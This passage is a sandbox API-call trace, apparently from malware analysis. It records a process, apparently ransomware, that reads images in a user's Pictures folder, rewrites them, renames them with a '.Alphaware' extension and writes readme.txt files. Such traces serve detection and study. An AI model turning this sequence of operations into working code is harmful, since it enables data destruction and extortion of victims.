"c:\\users\\keecfmwgj\\pictures\\q_m8xgrwlwvpa_ok jpb.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.597] GetFileType (hFile=0x254) returned 0x1 [0085.597] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0085.597] GetFileType (hFile=0x254) returned 0x1 [0085.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0085.602] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\q_m8XgrWlwVpa_ok Jpb.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\q_m8xgrwlwvpa_ok jpb.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x561aa0, ftCreationTime.dwHighDateTime=0x1d970fd, ftLastAccessTime.dwLowDateTime=0xc837ddf0, ftLastAccessTime.dwHighDateTime=0x1d97351, ftLastWriteTime.dwLowDateTime=0x853959e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x17920)) returned 1 [0085.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0085.602] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\q_m8XgrWlwVpa_ok Jpb.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\q_m8xgrwlwvpa_ok jpb.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\q_m8XgrWlwVpa_ok Jpb.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\q_m8xgrwlwvpa_ok jpb.jpg.alphaware")) returned 1 [0085.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0085.603] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x853959e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x853959e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.603] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc27b56f0, ftCreationTime.dwHighDateTime=0x1d96fe4, ftLastAccessTime.dwLowDateTime=0x1d7ff830, ftLastAccessTime.dwHighDateTime=0x1d975d5, ftLastWriteTime.dwLowDateTime=0x1d7ff830, ftLastWriteTime.dwHighDateTime=0x1d975d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGtmsH0_nmfPfsQOHtip", cAlternateFileName="CGTMSH~1")) returned 1 [0085.603] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ee72bc0, ftCreationTime.dwHighDateTime=0x1d967d7, ftLastAccessTime.dwLowDateTime=0x48a5c910, ftLastAccessTime.dwHighDateTime=0x1d97268, ftLastWriteTime.dwLowDateTime=0x85218c20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11ff4, dwReserved0=0x0, dwReserved1=0x0, cFileName="CKk3Lv0r a.png.Alphaware", cAlternateFileName="CKK3LV~1.ALP")) returned 1 [0085.603] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x852fd460, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x374, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0085.603] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x561aa0, ftCreationTime.dwHighDateTime=0x1d970fd, ftLastAccessTime.dwLowDateTime=0xc837ddf0, ftLastAccessTime.dwHighDateTime=0x1d97351, ftLastWriteTime.dwLowDateTime=0x853959e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x17920, dwReserved0=0x0, dwReserved1=0x0, cFileName="q_m8XgrWlwVpa_ok Jpb.jpg.Alphaware", cAlternateFileName="Q_M8XG~1.ALP")) returned 1 [0085.603] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8523ed80, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8523ed80, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85264ee0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0085.604] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18b116d0, ftCreationTime.dwHighDateTime=0x1d96686, ftLastAccessTime.dwLowDateTime=0xe0bfd080, ftLastAccessTime.dwHighDateTime=0x1d97180, ftLastWriteTime.dwLowDateTime=0xe0bfd080, ftLastWriteTime.dwHighDateTime=0x1d97180, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sD_Mf", cAlternateFileName="")) returned 1 [0085.604] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb139e870, ftCreationTime.dwHighDateTime=0x1d9718d, ftLastAccessTime.dwLowDateTime=0x5f3e4290, ftLastAccessTime.dwHighDateTime=0x1d974c7, ftLastWriteTime.dwLowDateTime=0x5f3e4290, ftLastWriteTime.dwHighDateTime=0x1d974c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="w0y6K3cxjraf-y2uE6", cAlternateFileName="W0Y6K3~1")) returned 1 [0085.604] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0085.604] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0085.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0085.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0085.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0085.604] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc27b56f0, ftCreationTime.dwHighDateTime=0x1d96fe4, ftLastAccessTime.dwLowDateTime=0x1d7ff830, ftLastAccessTime.dwHighDateTime=0x1d975d5, ftLastWriteTime.dwLowDateTime=0x1d7ff830, ftLastWriteTime.dwHighDateTime=0x1d975d5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.604] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d6eb450, ftCreationTime.dwHighDateTime=0x1d971f6, ftLastAccessTime.dwLowDateTime=0x20630d20, ftLastAccessTime.dwHighDateTime=0x1d97423, ftLastWriteTime.dwLowDateTime=0x20630d20, ftLastWriteTime.dwHighDateTime=0x1d97423, nFileSizeHigh=0x0, nFileSizeLow=0x695e, dwReserved0=0x0, dwReserved1=0x0, cFileName="dFW79KlkBOtau4aDuO.jpg", cAlternateFileName="DFW79K~1.JPG")) returned 1 [0085.604] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68843ee0, ftCreationTime.dwHighDateTime=0x1d972d8, ftLastAccessTime.dwLowDateTime=0xf775a7d0, ftLastAccessTime.dwHighDateTime=0x1d97565, ftLastWriteTime.dwLowDateTime=0xf775a7d0, ftLastWriteTime.dwHighDateTime=0x1d97565, nFileSizeHigh=0x0, nFileSizeLow=0xb190, dwReserved0=0x0, dwReserved1=0x0, cFileName="H8WEhqDt-nLLYwL7w3.gif", cAlternateFileName="H8WEHQ~1.GIF")) returned 1 [0085.605] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3ef3020, ftCreationTime.dwHighDateTime=0x1d971d0, ftLastAccessTime.dwLowDateTime=0xf639770, ftLastAccessTime.dwHighDateTime=0x1d9750d, ftLastWriteTime.dwLowDateTime=0xf639770, ftLastWriteTime.dwHighDateTime=0x1d9750d, nFileSizeHigh=0x0, nFileSizeLow=0xa64e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vo9MO3eEU2 SLpQJWfM.png", cAlternateFileName="VO9MO3~1.PNG")) returned 1 [0085.605] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc65b13c0, ftCreationTime.dwHighDateTime=0x1d97627, ftLastAccessTime.dwLowDateTime=0x7b0120b0, ftLastAccessTime.dwHighDateTime=0x1d9766b, ftLastWriteTime.dwLowDateTime=0x7b0120b0, ftLastWriteTime.dwHighDateTime=0x1d9766b, nFileSizeHigh=0x0, nFileSizeLow=0x1628f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZKwJY960tnphZx9R1d2d.jpg", cAlternateFileName="ZKWJY9~1.JPG")) returned 1 [0085.605] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0085.605] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0085.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0085.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0085.605] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\dFW79KlkBOtau4aDuO.jpg", dwFileAttributes=0x80) returned 1 [0085.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0085.605] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\dFW79KlkBOtau4aDuO.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\dfw79klkbotau4aduo.jpg"), fInfoLevelId=0x0, lpFileInformation=0x25c0368 | out: lpFileInformation=0x25c0368*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5d6eb450, ftCreationTime.dwHighDateTime=0x1d971f6, ftLastAccessTime.dwLowDateTime=0x20630d20, ftLastAccessTime.dwHighDateTime=0x1d97423, ftLastWriteTime.dwLowDateTime=0x20630d20, ftLastWriteTime.dwHighDateTime=0x1d97423, nFileSizeHigh=0x0, nFileSizeLow=0x695e)) returned 1 [0085.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0085.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0085.606] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\dFW79KlkBOtau4aDuO.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\dfw79klkbotau4aduo.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.606] GetFileType (hFile=0x254) returned 0x1 [0085.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0085.606] GetFileType (hFile=0x254) returned 0x1 [0085.606] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x695e [0085.606] ReadFile (in: hFile=0x254, lpBuffer=0x25c0630, nNumberOfBytesToRead=0x695e, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x25c0630*, lpNumberOfBytesRead=0x23ea98*=0x695e, lpOverlapped=0x0) returned 1 [0085.607] CloseHandle (hObject=0x254) returned 1 [0085.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0085.630] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\dFW79KlkBOtau4aDuO.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\dfw79klkbotau4aduo.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.633] GetFileType (hFile=0x254) returned 0x1 [0085.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0085.633] GetFileType (hFile=0x254) returned 0x1 [0085.635] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0085.635] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\dFW79KlkBOtau4aDuO.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\dfw79klkbotau4aduo.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d6eb450, ftCreationTime.dwHighDateTime=0x1d971f6, ftLastAccessTime.dwLowDateTime=0x20630d20, ftLastAccessTime.dwHighDateTime=0x1d97423, ftLastWriteTime.dwLowDateTime=0x853e1ca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8d48)) returned 1 [0085.635] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0085.635] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\dFW79KlkBOtau4aDuO.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\dfw79klkbotau4aduo.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\dFW79KlkBOtau4aDuO.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\dfw79klkbotau4aduo.jpg.alphaware")) returned 1 [0085.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0085.636] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.636] GetFileType (hFile=0x254) returned 0x1 [0085.636] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0085.636] GetFileType (hFile=0x254) returned 0x1 [0085.638] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\H8WEhqDt-nLLYwL7w3.gif", dwFileAttributes=0x80) returned 1 [0085.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0085.638] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\H8WEhqDt-nLLYwL7w3.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\h8wehqdt-nllywl7w3.gif"), fInfoLevelId=0x0, lpFileInformation=0x2486900 | out: lpFileInformation=0x2486900*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x68843ee0, ftCreationTime.dwHighDateTime=0x1d972d8, ftLastAccessTime.dwLowDateTime=0xf775a7d0, ftLastAccessTime.dwHighDateTime=0x1d97565, ftLastWriteTime.dwLowDateTime=0xf775a7d0, ftLastWriteTime.dwHighDateTime=0x1d97565, nFileSizeHigh=0x0, nFileSizeLow=0xb190)) returned 1 [0085.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0085.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0085.638] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\H8WEhqDt-nLLYwL7w3.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\h8wehqdt-nllywl7w3.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0085.639] ReadFile (in: hFile=0x254, lpBuffer=0x2486bc8, nNumberOfBytesToRead=0xb190, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2486bc8*, lpNumberOfBytesRead=0x23ea98*=0xb190, lpOverlapped=0x0) returned 1 [0085.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0085.699] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\H8WEhqDt-nLLYwL7w3.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\h8wehqdt-nllywl7w3.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0085.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0085.702] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\H8WEhqDt-nLLYwL7w3.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\h8wehqdt-nllywl7w3.gif"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68843ee0, ftCreationTime.dwHighDateTime=0x1d972d8, ftLastAccessTime.dwLowDateTime=0xf775a7d0, ftLastAccessTime.dwHighDateTime=0x1d97565, ftLastWriteTime.dwLowDateTime=0x8547a220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xeda0)) returned 1 [0085.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0085.702] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\H8WEhqDt-nLLYwL7w3.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\h8wehqdt-nllywl7w3.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\H8WEhqDt-nLLYwL7w3.gif.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\h8wehqdt-nllywl7w3.gif.alphaware")) returned 1 [0085.703] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\Vo9MO3eEU2 SLpQJWfM.png", dwFileAttributes=0x80) returned 1 [0085.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0085.703] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\Vo9MO3eEU2 SLpQJWfM.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\vo9mo3eeu2 slpqjwfm.png"), fInfoLevelId=0x0, lpFileInformation=0x2530fd0 | out: lpFileInformation=0x2530fd0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe3ef3020, ftCreationTime.dwHighDateTime=0x1d971d0, ftLastAccessTime.dwLowDateTime=0xf639770, ftLastAccessTime.dwHighDateTime=0x1d9750d, ftLastWriteTime.dwLowDateTime=0xf639770, ftLastWriteTime.dwHighDateTime=0x1d9750d, nFileSizeHigh=0x0, nFileSizeLow=0xa64e)) returned 1 [0085.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0085.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0085.704] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\Vo9MO3eEU2 SLpQJWfM.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\vo9mo3eeu2 slpqjwfm.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0085.704] ReadFile (in: hFile=0x254, lpBuffer=0x25312a8, nNumberOfBytesToRead=0xa64e, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x25312a8*, lpNumberOfBytesRead=0x23ea98*=0xa64e, lpOverlapped=0x0) returned 1 [0085.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0085.728] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\Vo9MO3eEU2 SLpQJWfM.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\vo9mo3eeu2 slpqjwfm.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0085.735] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0085.735] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\Vo9MO3eEU2 SLpQJWfM.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\vo9mo3eeu2 slpqjwfm.png"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3ef3020, ftCreationTime.dwHighDateTime=0x1d971d0, ftLastAccessTime.dwLowDateTime=0xf639770, ftLastAccessTime.dwHighDateTime=0x1d9750d, ftLastWriteTime.dwLowDateTime=0x854c64e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xde88)) returned 1 [0085.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0085.736] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\Vo9MO3eEU2 SLpQJWfM.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\vo9mo3eeu2 slpqjwfm.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\Vo9MO3eEU2 SLpQJWfM.png.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\vo9mo3eeu2 slpqjwfm.png.alphaware")) returned 1 [0085.736] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\ZKwJY960tnphZx9R1d2d.jpg", dwFileAttributes=0x80) returned 1 [0085.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0085.737] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\ZKwJY960tnphZx9R1d2d.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\zkwjy960tnphzx9r1d2d.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23f28e0 | out: lpFileInformation=0x23f28e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc65b13c0, ftCreationTime.dwHighDateTime=0x1d97627, ftLastAccessTime.dwLowDateTime=0x7b0120b0, ftLastAccessTime.dwHighDateTime=0x1d9766b, ftLastWriteTime.dwLowDateTime=0x7b0120b0, ftLastWriteTime.dwHighDateTime=0x1d9766b, nFileSizeHigh=0x0, nFileSizeLow=0x1628f)) returned 1 [0085.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0085.737] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0085.737] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\ZKwJY960tnphZx9R1d2d.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\zkwjy960tnphzx9r1d2d.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0085.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0085.737] ReadFile (in: hFile=0x254, lpBuffer=0x1283e218, nNumberOfBytesToRead=0x1628f, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x1283e218*, lpNumberOfBytesRead=0x23ea98*=0x1628f, lpOverlapped=0x0) returned 1 [0085.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0085.760] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\CGtmsH0_nmfPfsQOHtip\\ZKwJY960tnphZx9R1d2d.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\cgtmsh0_nmfpfsqohtip\\zkwjy960tnphzx9r1d2d.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0085.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0085.765] 